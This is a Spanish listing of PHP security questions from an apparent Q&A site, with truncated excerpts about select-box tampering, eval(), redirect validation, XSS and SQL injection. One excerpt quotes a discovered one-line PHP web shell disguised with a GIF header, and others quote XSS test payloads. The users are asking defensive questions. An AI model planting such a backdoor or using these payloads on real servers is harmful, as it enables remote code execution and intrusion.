Preguntas con etiqueta 'php'

preguntas con etiqueta
3
respuestas

asegurando cuadros desplegables

He estado creando cuadros de selección durante años, pero nunca supe que podría modificarlo con firebug y enviarlos con valores no permitidos, por supuesto, esto no sucedería si el código estuviera protegido. Aquí hay un ejemplo: <select...
hecha 13.03.2012 - 20:22
2
respuestas

PHP filter_input () no protege de eval ()

Estaba actualizando algunos códigos PHP siguiendo el consejo de no usar más $_GET y $_POST , sino que, en cambio, cambiar a las funciones filter_input() más seguras. Estaba pensando que la función me salvaría en este estúp...
hecha 01.03.2016 - 15:39
5
respuestas

Código para validar la URL de redireccionamiento

Mi aplicación web me permite indicar al formulario de inicio de sesión que redirija a una página determinada en el sitio web después de iniciar sesión correctamente. Por ejemplo, si el usuario va a la url http://localhost/login.php?returnto=%...
hecha 24.08.2016 - 16:23
3
respuestas

¿Este archivo PHP que contiene una evaluación de una variable POST es una indicación de compromiso?

Encontré este archivo en mi servidor, contiene el siguiente código: GIF89a <?php eval ($_POST[plm12345plm]); ?> No hay otro código al lado de este. ¿Es esto malicioso?     
hecha 04.05.2015 - 21:25
2
respuestas

¿Puede la función 'sistema' plantear amenazas de seguridad severas en un servidor de alojamiento compartido?

Hace poco compré una cuenta de una empresa de alojamiento compartido y necesitaba que la función php system estuviera habilitada para uno de mis proyectos. Así que creé un ticket y les pedí que lo habilitaran. Esto es lo que respondieron...
hecha 22.08.2012 - 15:37
2
respuestas

Si se conoce el texto cifrado, el texto sin formato y el nonce, ¿se puede determinar la clave secreta?

Estoy usando las funciones sodium_crypto_secretbox y sodium_crypto_secretbox_open en PHP (actualmente PHP 5.6, usando paragonie/sodium_compat ). Si un usuario tiene texto cifrado, no cifrado y descifrado, ¿puede determinar...
hecha 30.06.2018 - 15:04
3
respuestas

¿Cómo arreglar problemas XSS específicos en la URL a través de php?

Estoy usando la edición de la comunidad Netsparker para verificar si mi aplicación tiene algún agujero de seguridad general. Estoy recibiendo muchas de las siguientes áreas de problemas probables de XSS: my_php_file.php?nsextt=" stYle=x:expre/...
hecha 11.05.2012 - 06:06
2
respuestas

Es $ _REQUEST ['id'] vulnerable a la inyección de SQL

Tengo el siguiente código en mi newsview.php. Quiero saber por qué el código de abajo es vulnerable a la inyección de SQL. Ya probé la inyección de SQL en el código de abajo. $id = intval($_REQUEST['id']); $result = mysql_query("SELECT * FROM...
hecha 31.10.2013 - 05:49
2
respuestas

¿Es una debilidad poder ver los scripts del lado del servidor?

¿Los idiomas como Cold Fusion y PHP son menos seguros porque están incrustados en HTML que se envía a un cliente? Alguien me dijo que están menos seguros porque carecen de abstracción. CLARIFICACIÓN: Creo que, por abstracción, lo que quiso de...
hecha 29.08.2012 - 05:45
3
respuestas

¿Puedo evitar los ataques XSS con la función MySQL REPLACE?

¿Puedo prevenir el ataque XSS mediante la función de reemplazo de MySQL? ¿Es este método seguro y aceptable? Ejemplo a continuación: INSERT INTO persons(Name, Surname) VALUES(REPLACE('<script>alert("Test")</script>', '<scrip...
hecha 12.11.2016 - 22:27